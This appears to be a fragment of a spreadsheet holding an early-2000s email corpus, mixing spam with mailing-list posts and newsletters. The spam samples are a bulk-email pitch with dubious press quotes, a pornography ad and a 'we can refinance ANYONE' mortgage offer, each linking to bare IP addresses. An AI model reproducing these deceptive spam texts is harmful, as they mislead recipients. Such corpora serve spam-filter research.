 HERE'S WHAT THE EXPERTS HAVE TO SAY ABOUT E-MAIL MARKETING:
 "A gold mine for those who can take advantage of
 bulk e-mail programs" - The New York Times
 "E-mail is an incredible lead generation tool"
 - Crains Magazine
 Click here to find out how YOU can do it:
 &lt;a href="http://32.97.166.75/usinet.zvlavii"&gt;
 http://32.97.166.75/usinet.zvlavii &lt;/a&gt;
 ==========================================================
 -=-=-=-=-=-=-=-=-=-=-Remove Instructions=-=-=-=-=-=-=-=-=-
 **********************************************************
 Do not reply to this message - To be removed from future
 mailings, Click Here:
 &lt;a href="mailto:tiana37@flashmail.com?Subject=Remove"&gt;
 mailto:tiana37@flashmail.com?Subject=Remove &lt;/a&gt;
 Please do not include correspondence with your remove 
 request  - all requests processed automatically.
 **********************************************************
  [&amp;*TG0]
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, Aug 23, 2002 at 09:26:47AM +0100, Padraig Brady wrote:
 [...]
 &gt; probably a bit old, 7.3 and 8.0 are out.
 And I've been told by a SuSE rep that 8.1 will be out in October,
 for those who are interested.
 David	
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 21 Aug 2002 11:34:28 -0400, you wrote:
 &gt;If you sign up for something, it's not spam by definition, aggressive as
 &gt;they may be.  (I told them to stop calling me, and they stopped, so ...)
 I agree.  In a way, I signed up just by buying steaks from them.  However, once
 I tell them to stop, everything after that is spam.  I told them to stop *many*
 times.
 It's a pity, too, since they have great steaks.  Buying from them is just not
 worth having to put up with all of that clinginess.
 -------------------------------------------------------
 This sf.net email is sponsored by: OSDN - Tired of that same old
 cell phone?  Get a new here for FREE!
 https://www.inphonic.com/r.asp?r_______________________________________________
 Spamassassin-talk mailing list
 Spamassassin-talk@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 100% FREE HARDCORE MEGASITE!!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body&gt;
 &lt;p&gt;100% Free Porn!&lt;br&gt;
 What more can you ask for?&lt;/p&gt;
 &lt;p&gt;&lt;b&gt;&lt;font size="4"&gt;&lt;a href="http://216.129.174.178/"&gt;CLICK HERE&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&lt;font size="2"&gt;REMOVAL INSTRUCTIONS: We strive to never send unsolicited mail.&lt;br&gt;
 However, if you'd rather not receive future e-mails from us,&lt;br&gt;
 &lt;a href="mailto:cheech@inbox.lv"&gt;CLICK HERE&lt;/a&gt; to send email and add the word REMOVE in the subject line.&lt;br&gt;
 Please allow 48 hours for processing.&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
  [(^(PO1:KJ)_8J7BJK9^":}H&amp;*TG0BK5NKIYs5]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</si>
  <si>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best mortgage rate                      VJD
</t>
  </si>
  <si>
    <t xml:space="preserve">With regards to
 Want to refinance?
 Fill out this quick form and immediately have mortgage
 companies compete for you business. 
 You will be offered the, absolute, BEST refinance rates 
 available!
 Your credit doesn't matter, don't even worry about past 
 credit problems, we can refinance ANYONE!
 Let Us Put Our Expertise to Work for You!
 http://66.230.217.86
 or site 2
 http://agileconcepts.com/74205/
 Erase
 http://66.230.217.86/optout.htm
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/applecore/20020709.html"&gt;
       http://www.lockergnome.com/issues/applecore/20020709.html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#14367A }
  a:link    { COLOR: #2E64DC; TEXT-DECORATION: underline; font-weight: normal }
  a:visited { COLOR: #000000; TEXT-DECORATION: underline; font-weight: normal }
  a:active  { COLOR: GRAY; text-decoration: none }
  a:hover   { color: GRAY; TEXT-DECORATION: none }
  p.title   { BACKGROUND: #2E64DC; BORDER-BOTTOM: #14367A 4px solid; BORDER-LEFT: #94B2EE 4px solid; BORDER-RIGHT: #14367A 4px solid; BORDER-TOP: #94B2EE 4px solid; COLOR: #FFFFFF; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 14pt; FONT-WEIGHT: normal }
  p.sidebar { BACKGROUND: #94B2EE; BORDER-BOTTOM: #2E64DC 3px solid; BORDER-LEFT: #FFFFFF 3px solid; BORDER-RIGHT: #2E64DC 3px solid; BORDER-TOP: #FFFFFF 3px solid; COLOR: #14367A; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 10pt; FONT-WEIGHT: bold; TEXT-ALIGN: center }
  .url      { font-size: 8pt; font-family: Verdana, Tahoma, Arial }
 --&gt;
 &lt;/style&gt;&lt;title&gt;20020709 Lockergnome Apple Core&lt;/title&gt;&lt;/head&gt;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&lt;!--#include virtual="/include/banner.txt" --&gt;
  &lt;/td&gt;&lt;/tr&gt;
   &lt;tr&gt;&lt;td valign="top" bgcolor="#FFFFFF"&gt;&lt;font color="#14367A" face="Verdana, Tahoma, Arial" style="font-size: 10pt" size="2"&gt;
 &lt;!-- NEWS --&gt;
 &lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;
 &amp;nbsp; 07.09.2002 GnomeREPORT &lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;Content Management Is Key:&lt;/b&gt; Need a reason your boss should be sending you to Gnomedex? Some of the leading experts on content management solutions (those things we affectionately call blogs) will be sharing the future of blogging and how you can adapt it to both the way you do business and the way you communicate in general. Join Evan Williams and Doc Searls as they share pearls of wisdom on blogging, Linux and other open source applications that are changing our lives. If that's not enough incentive, remind the boss that THE Internet security guru, Steve Gibson, will be sharing his wisdom as well. 
 &lt;a href="http://www.gnomedex.com"&gt;Register for Gnomedex today&lt;/a&gt;!   
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 I've finally done it! Lockrgnome's Top 50 
 &lt;a href="http://www.gnometomes.com/tome/cat_macintosh.html"&gt;Mac OS X Tips&lt;/a&gt; is in publication 
 and available for purchase at GnomeTomes.com. Less than half the tips have 
 appeared in the Apple Core newsletter already, so purchasing them means 
 getting mostly brand new content. This represents the first thing I've 
 written that people might actually pay to read, so if we sell one copy, 
 I'll be ecstatic. And hopefully, any of you who check out the tips will 
 find them useful. I know that figuring out how to do each of the 50 things 
 on the list has improved my personal OS X experience.
 &lt;p&gt;
 Although this newsletter started out with Chris, Randy, and I writing 
 sections of the newsletter, time constraints have limited the 
 contributions of the other two guys. This does not mean either of them is 
 truly less involved, it just means I'm doing more writing. Both Chris and 
 Randy regularly send me links to cool Mac stuff they find, much of which 
 will ultimately end up in upcoming issues. Since the writing will be 
 primarily mine, I've opted to eliminate the "Review by" links at the bottom 
 of each article. Unless otherwise noted, you can safely assume I wrote it. 
 If you need to send me an e-mail, the E-mail The Editors Link in the 
 sidebar will reach me, as well as putting your message in front of Chris 
 and Randy.
 &lt;p&gt;
 I've been doing some exploring of AppleScript over the past several months 
 and believe I'm finally confidant enough in writing scripts that I'm going 
 to add a section on scripting to the newsletter. I'm curious to know what 
 your level of experience with scripting is, because I can either start with 
 some really basic stuff, or skip the basics and dive into meatier scripting 
 topics. Either way, I'm open to some 
 &lt;a href="mailto:jake@lockergnome.com?subject=AppleScript"&gt;AppleScript suggestions&lt;/a&gt;.
 &lt;p align="right"&gt;See You in &lt;a target="_blank" href="http://www.gnomedex.com/"&gt;August&lt;/a&gt;,&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;font style="font-size: 23pt" face="Jake Ludington, Script" size="5"&gt;Jake Ludington&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/font&gt;&lt;/P&gt;
 &lt;p class="url"&gt;For Mac Outlook users:&lt;br&gt;
 OS X Tips - http://www.gnometomes.com/tome/cat_macintosh.html&lt;/p&gt;
 &lt;!-- DOWNLOADS --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeDOWNLOADS&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Sherlock Plugins v2.2 [600k] Mac OS 9/OSX FREE&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://www.searchstandard.com/"&gt;http://www.searchstandard.com/&lt;/a&gt;&lt;p&gt;
 While doing some research for my top 50 tips, I discovered that turning 
 off some of Sherlock's extras, like multi-language indexing, in the 
 preferences will speed things up considerably, particularly for local 
 machine searches. This renewed my interest in finding ways to add-on 
 search capabilities to the bundled sleuth, resulting in my discovery of 
 SearchStandard.com. This bundled collection of search plug-ins makes it 
 possible to look for almost anything using Sherlock. Their Web site 
 won't wow you, but SearchStandard's free plugins most certainly make 
 finding things online, including searches on your favorite Mac sites, 
 that much easier.
 &lt;!-- GnomeNETWORK --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeNETWORK&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Xnet v1.0.6 [216k] OSX $48&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://bitcom.ch/products-xnet-e.html"&gt;http://bitcom.ch/products-xnet-e.html&lt;/a&gt;&lt;p&gt;
 Dealing with servers that offer mission critical services, like 
 intranet access, e-mail, or Web serving, means dealing with those 
 services failing from time to time. Don't be left in the dark 
 when one of your services go down, let Xnet keep you informed. 
 The unregistered version of the product lets you verify http, 
 ping, smtp, and ftp service availability, with many more service 
 verifications included in the pro version. Xnet runs on your 
 local machine, verifying remote service availability and sending 
 you a message when those services go down. The interface allows 
 for user-defined services, with alert features for both an e-mail 
 account (mine alerts are going to my cell phone) and locally via 
 a sound from your machine.
 &lt;!--  GnomeTERMINAL --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeTERMINAL&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 For OS X installs with multiple users, there may come a time when you 
 need to change ownership of a particular file. This is particularly 
 useful in situations where one user created a file, but an entirely 
 different user is the only one who will ever make future decisions 
 relating to that file, like whether to keep it or throw it in the 
 Trash. chown is the Terminal command designed to handle this. From 
 the command line type:
 &lt;p&gt;
 sudo chown username filename
 &lt;p&gt;
 You'll of course want to substitute the username of the new owner for 
 username. The name of the file receiving a change of ownership will 
 replace filename.
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;50 LINUX TIPS:&lt;/b&gt; From the mind behind the Penguin Shell come two 
 more eBooks in the GnomeTome series. Whether you are a Linux newbie 
 or command line guru, you'll want these tips as part of your 
 information arsenal. 
 &lt;a href="http://www.gnometomes.com/tome/cat_linux.html"&gt;Get your copy&lt;/a&gt; 
 of Tony's Top 50 PenguinTWEAKS or Top 50 PenguinCORE tips today!    
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 &lt;!-- FAVORITE --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeFAVORITE&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Susan Kare&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://www.kare.com"&gt;http://www.kare.com&lt;/a&gt;&lt;p&gt;
 As we move further into the future of Apple's Mac OS evolution, it 
 remains important to understand where things evolved from. Susan 
 Kare designed all the original icons for the Mac OS, way back in 
 1983. In fact, that smiling Mac that appears as OS X boots is her 
 creation. Check out her collection of UI artwork, from both Windows 
 and Mac operating systems. Also available from Kare.com are Kare 
 designed icon apparel and collections of fonts as designed by Susan.
 &lt;!-- GnomeTIP --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeTIP&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 Show Info gives you access to change the application associated with a 
 particular file type, rename files, and reassign permissions. One of 
 the best features of Show Info is it's ability to store "comments" 
 related to a file or application. This can be a great place to store 
 information on recently made changes to a file, information from others 
 who've looked at a file, or in the case of applications, serial numbers 
 and other pertinent data you may need when dealing with tech support.
 &lt;!-- ADMINISTRIVIA --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table cellpadding="0" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="sidebar"&gt;
 &lt;table cellpadding="7" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 8pt" face="Verdana, Tahoma, Arial" size="1"&gt;
 &lt;a href="http://www.lockergnome.com/issues/applecore/20020709.html"&gt;http://www.lockergnome.com/issues/applecore/20020709.html&lt;/a&gt;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color="#14367A" face="Verdana, Tahoma, Arial" style="font-size: 8pt"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href="https://www.sandhills.com/secure/smartcomputing/cpufreetrial.asp?source=cpu235"&gt;Computer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amp;#109;&amp;#97;&amp;#105;&amp;#108;&amp;#116;&amp;#111;&amp;#58;&amp;#102;&amp;#101;&amp;#101;&amp;#100;&amp;#98;&amp;#97;&amp;#99;&amp;#107;&amp;#64;&amp;#108;&amp;#111;&amp;#99;&amp;#107;&amp;#101;&amp;#114;&amp;#103;&amp;#110;&amp;#111;&amp;#109;&amp;#101;&amp;#46;&amp;#99;&amp;#111;&amp;#109;?subject=Lockergnome Apple Core Comment"&gt;E-mail the Editors&lt;/a&gt;&lt;br&gt;
 &lt;p&gt;&amp;nbsp;&lt;p&gt;&lt;table cellpadding="0" cellspacing="0" border="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p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</si>
  <si>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Chuck Murcko wrote:
 &gt; Heh, ten years ago saying the exact same words was most definitely not 
 &gt; "parroting the party line".
 &gt;
 &gt; It was even less so thirty years ago. My story remains the same, take 
 &gt; it or leave it. I've said the same words to white supremacists as to 
 &gt; suburban leftist punks as to homeys as to French Irish, etc. etc.:
 &gt;
 &gt; I don't have to agree with anything you say. I *am* obligated to 
 &gt; defend to the death your right to say it. I don't give a rat's ass 
 &gt; where you say it, even in France. I don't care where the political 
 &gt; pendulum has swung currently.
 &gt;
 &gt; Chuck
 I had to laugh at Rumsfield yesterday - when he was heckled by 
 protestors, he said something like "They couldn't do that in Iraq." 
 Meanwhile, from what I could tell, the protestors were being arrested.
 Owen
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Digital service launches with 30 free channels
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8535468,215/
 Date: 2002-10-04T02:38:57+01:00
 *Media:* BBC and Sky-backed service will be launched at the end of this month 
 with 30 free channels.
</t>
  </si>
  <si>
    <t xml:space="preserve">Someone needs to tell the mayor about this:
 http://www.cb-2000.com/
 kinkily yours,
 Cindy
 On Wed, 4 Sep 2002, Adam L. Beberg wrote:
 &gt; Shouldn't a politician know not to tell the truth? Odds he's impeached by
 &gt; next Monday? [ob: no-clue-how-they-remove-mayors-in-italy]
 &gt; 
 &gt; Ouch. Ouch. Ouch.
 &gt; 
 &gt; ------------
 &gt; 
 &gt; Get Sexier, Keep Husbands, Mayor Tells Wives
 &gt; Wed Sep 4, 9:14 AM ET
 &gt; 
 &gt; MISSAGLIA, Italy (Reuters) - Husband's eyes wandering? Make yourself sexier.
 &gt; At least that's the solution proposed by an Italian mayor -- and a woman
 &gt; mayor at that.
 &gt; 
 &gt; Wives in the northern town of Missaglia had complained to mayor Marta
 &gt; Casiraghi about a young woman who sunbathed topless on her terrace.
 &gt; 
 &gt; They complained that the men in the town of some 7,000 people were spending
 &gt; too much time ogling, so they asked Casiraghi to order the woman to put her
 &gt; clothes back on.
 &gt; 
 &gt; But the mayor, far from sympathizing, told the wives to get sexy if they
 &gt; wanted to keep their men. "The girl was very pretty and was soaking up some
 &gt; sun. Topless sunbathing is largely tolerated and widespread nowadays.
 &gt; There's nothing we can do," Casiraghi told Il Nuovo, a web-based newspaper.
 &gt; 
 &gt; "Instead, I'd advise the wives to play their rival at her own game -- make
 &gt; themselves more beautiful."
 &gt; 
 -- 
 "I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Plan
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/09/25.html#plan
 Date: 2002-09-25T10:43:06-05:00
 _Paul Ford_: Falling Off a Truck[1]. &amp;#8220;In the last 4 days I fell off a 
 truck and was dragged for 30 feet, and was interviewed by an NPR show. Those 
 two facts are not related except that they both happened to me and made me 
 queasy. I also wrote a short plan outlining the rest of my life.&amp;#8221;
 [1] http://ftrain.com/recent_update_etc.html
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Auctions Weekly Newsletter&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#eeeeee" alink=#0000FF vlink=#0000FF&gt;
 &lt;center&gt;
 &lt;a name="top"&gt;&lt;/a&gt;
 &lt;!-- header --&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=612 bgcolor="#ffffff"&gt;
 &lt;tr valign=top&gt;&lt;td width=442 colspan=4&gt;&lt;a href="http://clickthru.online.com/Click?q=d6-yw2KQMPMW6xk43enOIRzw0LGkkRR" &gt;
 &lt;img src="http://www.cnet.com/i/nl/au/hd.gif" width=442 height=60
 alt="Auctions Weekly Newsletter" border=0&gt;&lt;/a&gt;&lt;br&gt;
 &lt;table width=442 cellpadding=0 cellspacing=0 border=0 bgcolor="#ffcc00"&gt;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&lt;table cellpadding=0 cellspacing=0 border=0 width=160&gt;
 &lt;tr&gt;&lt;td align=center bgcolor="#eeeeee"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;iframe src="http://www.zdnet.com/include/ads/ifc/RGROUP=2560" scrolling="no" frameborder="0" hspace="0" vspace="0" height="600" width="160" marginheight="0" marginwidth="0"&gt;
 &lt;script language="JavaScript" src="http://www.zdnet.com/include/ads/js/RGROUP=2560"&gt;
 &lt;/script&gt;
 &lt;/iframe&gt;
 &lt;!-- bottom right column --&gt;        
 &lt;!-- search form --&gt;
 &lt;table cellspacing=0 cellpadding=0 width=150 border=0&gt;&lt;form method=get
 action="http://www.search.com/redirect"&gt;
 &lt;tr valign=top&gt;&lt;td&gt;&lt;font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value="http://auctions.cnet.com/cgi-bin/search/search?ss=%%q%%&amp;loc=auc"&gt;
 Auctions
  &lt;option
 value="http://cnet.search.com/search?tag=ex.auctions.dispatch.srch.cnet"
 &gt;All CNET
  &lt;option
 value="http://www.search.com/search?tag=ex.auctions.dispatch.srch.web"&gt;T
 he Web
 &lt;/select&gt;&amp;nbsp;&lt;input type=submit
 value="Go!"&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/form&gt;&lt;/table&gt;&lt;p&gt;
 &lt;!-- /search form --&gt;
 &lt;table width=160 bgcolor="#ffffef" cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td colspan=5 bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif"
 width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td width=1 bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif"
 width=1 height=1&gt;&lt;/td&gt;
 &lt;td width=6&gt;&lt;img src="http://www.cnet.com/b.gif" width=6 height=1&gt;&lt;/td&gt;
 &lt;td width=149&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;img
 src="http://www.cnet.com/b.gif" width=1 height=5&gt;&lt;br&gt;
 &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=ec-MHyXQVy13z6ShlJ1kOqFb2GVaGdR" &gt;Site
 Map&lt;/a&gt;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;
 &lt;a href="http://clickthru.online.com/Click?q=01-9oXDI2jxOqfFjlwvurMPGPxZ6RcR" &gt;Desktops&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;
 &lt;a href="http://clickthru.online.com/Click?q=16-T_cjI4cTyIcD6_xDblRuaBDxRURR" &gt;Notebooks&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;
 &lt;a href="http://clickthru.online.com/Click?q=2b-2FVYINzwpG7wISmwzk0xBfd-8WFR" &gt;Components&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;
 &lt;a href="http://clickthru.online.com/Click?q=40-6Pp4Idnjk7pEm0ceVXCHnpqL0w4R" &gt;Software&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;
 &lt;a href="http://clickthru.online.com/Click?q=55-TAHaIKJjcI4ckPrqm86ccJ_2d2eR" &gt;Input Devices&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;
 &lt;a href="http://clickthru.online.com/Click?q=6a-z_30IeW6ZSlYvuqzceCGFySNP8yR" &gt;Networking&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;
 &lt;a href="http://clickthru.online.com/Click?q=7f-bn6KIIPiqGNtxJb9IO3JewkhBpPR" &gt;Handhelds&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;
 &lt;a href="http://clickthru.online.com/Click?q=95-XdwrQvdKmP0G5eEr1yZeU_u_KnuR" &gt;Printers&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;
 &lt;a href="http://clickthru.online.com/Click?q=aa-gBteQXUQ1CMD2LcWLXZBXqONOVsR" &gt;Memory&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;
 &lt;a href="http://clickthru.online.com/Click?q=bf-JtRfQ8ZQwRxLGDi5w8PF_jEuwtZR" &gt;Storage&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;
 &lt;a href="http://clickthru.online.com/Click?q=d4-E0SqQ0EHeeqr06f_4Mc3148lk6dR" &gt;Electronics&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;
 &lt;a href="http://clickthru.online.com/Click?q=e9-gdzpQxVIg93JP10TRnU3P83P5XcR" &gt;Monitors&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;
 &lt;a href="http://clickthru.online.com/Click?q=fe-xkIgQwgsVMyGUFkeE4rbg6amtIRR" &gt;Modems&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;
 &lt;a href="http://clickthru.online.com/Click?q=13-NxSZI3XPQSRbFFUssDLfzpHOCeFR" &gt;Scanners&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;
 &lt;a href="http://clickthru.online.com/Click?q=28-A2wXIRdag3SP2FiEL2t1VlTK8y9R" &gt;Services&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;
 &lt;a href="http://clickthru.online.com/Click?q=3d-oi9NIbza6XC0GSZvwlGWUTnaNtuR" &gt;Digital Cameras&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;
 &lt;a href="http://clickthru.online.com/Click?q=52-LUXoIrJ9IR3PBMsMWz8AtIQwjjsR" &gt;Accessories&lt;/a&gt;&lt;br&gt;
 &amp;#149;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;
 &lt;a href="http://clickthru.online.com/Click?q=67-PnDkIOEkRnakOAcWhKPAKa1CPIPR" &gt;Multimedia&lt;/a&gt;&lt;br&gt;
 &lt;/b&gt;&lt;/font&gt;&lt;img src="http://www.cnet.com/b.gif" width=149 height=10&gt;&lt;/td&gt;
 &lt;td width=3&gt;&lt;img src="http://www.cnet.com/b.gif" width=3 height=1&gt;&lt;/td&gt;
 &lt;td width=1 bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=5 bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /bottom right column --&gt;
 &lt;P&gt;&lt;/P&gt;&lt;/TD&gt;
 &lt;TD width=9 rowSpan=2&gt;&lt;IMG height=60
 src="http://www.cnet.com/i/nl/dd_c.gif" width=9&gt;&lt;BR&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=9 border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD bgColor=#000000&gt;&lt;IMG height=1 src="http://www.cnet.com/b.gif" width=9&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;&lt;TD bgColor=#ffcc00&gt;&lt;IMG height=10 src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;&lt;TD bgColor=#000000&gt;&lt;IMG height=1 src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;
 &lt;TD width=1 bgColor=#000000 rowSpan=2&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=1 border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD bgColor=#eeeeee&gt;&lt;IMG height=60 src="http://www.cnet.com/b.gif" width=1&gt;
 &lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR vAlign=top&gt;
 &lt;TD width=1 bgColor=#000000&gt;&lt;IMG height=1 src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;
 &lt;TD width=10 bgColor=#ffcc00&gt;&lt;IMG height=1 src="http://www.cnet.com/b.gif" width=10&gt;&lt;/TD&gt;
 &lt;TD width=1 bgColor=#000000&gt;&lt;IMG height=1 src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;
 &lt;TD width=430 bgColor=#ffffff&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=430 bgColor=#EEEEEE border=0 bordercolor="#EEEEEE"&gt;
 &lt;TBODY&gt;
 &lt;tr&gt;
 &lt;td width="100%" colspan="3" align=bottom&gt;
 &lt;font face="arial, helvetica" size="-2" color="#000000"&gt;
 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;b&gt;July 18th, 2002&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;TR vAlign=top&gt;
 &lt;TD width=10&gt;&lt;IMG height=1 src="http://www.cnet.com/b.gif" width=10&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;IMG height=8 src="http://www.cnet.com/b.gif" width=1&gt;
 &lt;div align="center"&gt;
 &lt;table border="1" cellspacing="1" bordercolor="#FFCC00" width="100%" bgcolor="#FFFFFF"&gt;
 &lt;tr&gt;&lt;td&gt;&lt;div align="center"&gt;&lt;table border="0" cellspacing="0" width="100%"&gt;
 &lt;tr&gt;
 &lt;td width="100%" colspan="2"&gt;&lt;br&gt;
